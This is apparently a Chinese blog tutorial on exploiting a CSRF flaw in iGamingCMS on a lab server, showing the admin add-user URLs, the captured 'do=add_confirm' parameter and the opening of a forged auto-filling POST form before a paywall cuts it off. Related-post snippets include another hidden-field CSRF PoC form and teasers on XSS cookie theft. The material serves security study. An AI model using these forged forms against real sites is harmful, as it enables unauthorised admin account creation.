iGamingCMS CSRF漏洞伪造POST添加管理员

最新推荐文章于 2025-06-21 21:24:32 发布
原创 最新推荐文章于 2025-06-21 21:24:32 发布 · 1.4k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#CSRF

正常打开页面:http://192.168.209.137/CSRF0/admin/users.php?do=add_user
在这里插入图片描述
这个网页使用request来接受信息的,所以可以接收GET也可以接收POST,通过burp抓提交的数据包得。
在这里插入图片描述
可以看到后面有一个do参数为add_confirm和我们之前的写表单的网址http://192.168.209.137/CSRF0/admin/users.php?do=add_user有相同的参数。那么说明提交的时候是在do=add_confirm里进行的,get方式直接拼接url即可。接下来构造POST请求。

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF</title>
	<script>
	function abc(){
		var f=document.getElementById("test");
		f.getElementsByTagName("input")[0].value="user";
		f.getElementsByTagName("input")[1].value="pass";
		f.getElementsByTagName("input")[2].value="user";
		f.getElementsByTagName("input")[3].val
最低0.47元/天 解锁文章

200万优质内容无限畅学
记一次授权测试中POST型的CSRF漏洞发现
野原新之助
08-09 1298
单纯的改变Method为POST根本无法预防CSRF,因为攻击者只需要构造相应的POST表单,然后在代码中加入JS自动提交就OK了,丝毫不影响漏洞的利用。
CSRF漏洞案例---POST
Ethan024的博客
03-20 2091
CSRF漏洞案例—POST型(本文仅供技术学习与分享) 实验环境: 皮卡丘靶场—CSRFCSRF(POST) 实验步骤: 在原始的个人资料上进行修改,将性别改成Female,地址改成Beijing,邮箱改为lucy@qq.com: 查看burpsuite,发现请求通过POST方式提交,参数是通过请求体传输,因此无法通过URL伪造参数; 如图在burpsuite生成PoC 将Beijing改为ShangHai,lucy@qq.com改为jack@qq.com。再点击右下角Test
iGaming CMS-开源
05-15
iGaming CMS是专为游戏网站设计的内容管理系统。 它使用PHP和MySQL。
7.CSRF漏洞 POST请求隐藏
qq_34620296的博客
10-14 782
首先是新建一个CSRF PoC html文件 <form action="https://bug.chinacycc.com/action.php" method=POST> <input type="hidden" name="type" value="add&#95;address" /> <input type="hidden" name="info" value="111111" /> <input type="
Web攻防-XSS跨站&Cookie盗取&数据包提交&网络钓鱼&BEEF项目&XSS平台&危害利用
最新发布
SuperherRo的博客
06-21 595
知识点: 1、Web攻防-XSS跨站-手工代码&框架工具&在线平台 2、Web攻防-XSS跨站-Cookie盗取&数据提交&网络钓鱼
CSRF代码分析、漏洞讲解与post实战
永不垂头的博客
08-11 589
CSRF代码分析、漏洞讲解与post实战 一、csrf代码分析 index.php <!DOCTYPE html> <html> <head> <title>Login</title> </head> <body> <form action="" method="GET"> <p>name: <input type="text" name="name" /></
CSRF漏洞解析
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
01-07 310
文章目录一、漏洞概述1、简单概述2、场景分析3、CSRF与XSS的区别二、CSRF漏洞测试流程三、实验演示四、常见防御措施 一、漏洞概述 1、简单概述 Cross-site request forgery 简称为“CSRF”。 在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个 攻击也就完成了。所以CSRF攻击也被称为"one click"攻击。 2、场景分析 Coby,在一个购物网站上,试图修改自己的购物信息,比如收货地址。 正常情
espcms csrf漏洞 导致任意管理员添加1
08-03
由于在管理员添加页面缺少了必要的CSRF防护令牌,攻击者可以构造恶意的HTML页面,诱导用户点击,从而执行添加管理员的操作。 **二、漏洞成因** CSRF漏洞通常发生在Web应用中,当一个受信任的用户在未完全退出登录...
hucart-含有CSRF漏洞的源码.zip
12-31
CSRF(Cross-Site Request Forgery,跨站请求伪造)是一种常见的网络安全问题,它允许攻击者在用户已登录的情况下,诱导用户浏览器执行非本意的操作。在这个案例中,"hucart-含有CSRF漏洞的源码.zip" 提供了一个实际...
PHP 代码审计之添加管理员
发哥微课堂
09-02 529
0x00:前言 cms 注册用户时,存在添加管理员漏洞,记录如下。 0x01:代码追踪 首先,前台注册普通账号时,url 地址为 / user/regin.php,打开 regin.php 发现,刚开始是接收注册数据,并进行一些校验,代码如下: if(!check::CheckUser($_POST['user_name'])) { check::AlertExit("输入的用户...
csrf实验
weixin_33708432的博客
06-22 560
CSRF攻击实验 CSRF攻击涉及用户受害者,受信任的网站和恶意网站。当受害者与受信任的站点拥有一个活跃的会话同时,如果访问恶意网站,恶意网站会注入一个HTTP请求到为受信任的站点,从而破话用户的信息。 CSRF 攻击总是涉及到三个角色:信赖的网站(Collabtive)、受害者的 session 或 cookie 以及一个恶意网站。受害...
推荐40个专业的CMS下载
weixin_33798152的博客
06-16 1732
1. Joomla CMS (Recommend) Joomla is an award-winning content management system (CMS), which enables you to build Web sites and powerful online applications. Many aspects, including its ease-of-us...
CSRF跨站请求伪造漏洞原理及代码审计
11-05
课程声明:该课程是教学使用,视频内涉及漏洞利用方法,请勿在互联网环境中使用;维护互联网网络安全,人人有责。课程说明:课程为CISP-PTE子课程。实验所需环境:vmware;windows server一台;环境下载地址:实验环境下载地址在购买后单独发送课程主要解决问题:1、搞明白什么是,CSRFSRF能做什么事情?2、CSRF和XSS有什么区别?3、搞明白CSRF漏洞代码到底是什么样?逐行读代码让你看透CSRF。4、搞懂CSRF的防御方法。 如果有以上困惑赶紧学习吧,Margin老师工作日一般都是30分钟就能为你解答疑惑,沟通无延时、无障碍。
国外80款优秀开源的CMS
weixin_30446197的博客
07-18 2355
Joomla - popular, award-winning CMS that will help you build powerful online applications. XOOPS - extensible, easy to use; ideal tool for developing small to large dynamic community webs...
CSRF--跨站请求伪造
klcyl_0106的博客
05-12 448
1. 原理 小黑想要修改大白在购物网站www.xx.com上填写的会员地址。 先看下大白是如何修改自己的会员地址的:登录—修改会员信息,提交请求—修改成功。 所以小黑想要修改大白的信息,他需要拥有:1.登录权限 2.修改个人信息的请求。 但是大白又不会把自己xx网站的账号密码告诉小黑,那小黑怎么办? 于是他自己跑到www.xx.com上注册了一个自己的账号,然后修改了一下自己的个人信息(比如:E-mail地址),他发现修改的请求是: http://www.xxx.com/edit.php?email=xia
YCCMS 3.3 CSRF漏洞--代码执行
浅笑996的博客
02-14 2964
一、 启动环境 1.双击运行桌面phpstudy.exe软件 2.点击启动按钮,启动服务器环境 二、代码审计 1.双击启动桌面Seay源代码审计系统软件 2.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\YCCMS),点击确定 漏洞分析 1.点击展开左侧admin目录,在弹出的下拉列表中双击index.php页面,右侧页面可以看到相关代码。 &amp;lt;?php requir...
CNVD原创漏洞证书总结
热门推荐
黑面狐
09-12 4万+
之前打算申请个CNVD的原创漏洞证书。经过这一个多月的时间证书下来了,现在简单总结一下。 原创漏洞审核和处理流程参考此链接:http://www.cnvd.org.cn/webinfo/show/3933 然后我就说说我提交过两个后台的文件上传漏洞 7.26提交-7.27二审通过,验证通过-9.4三审通过,漏洞归档-9.9漏洞公开 我在想漏洞公开了,怎么证书也应该下来了,我这个通用型的漏洞...
实战审计cms之CSRF——CSRF+Xss+Flash钓鱼
hackzkaq的博客
05-18 642
更多渗透技能 欢迎搜索公众号:白帽子左一 作者:掌控安全-holic 前言 CSRF感觉似乎很不值钱的样子,我前几天审计出了3个后台存储xss+csrf 然后cnvd跟我说不收csrf和后台存储xss,自此后台我从不找xss和csrf 但是毕竟作为目前毕竟出名流行的一个漏洞,还是讲解一下,我会讲的很简单,ojbk 0x01 CSRF介绍 CSRF的全名为Cross-site request forgery,它的中文名为 跨站请求伪造 CSRF是一种夹持用户在已经登陆的web应用程序上执行非本意的操
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值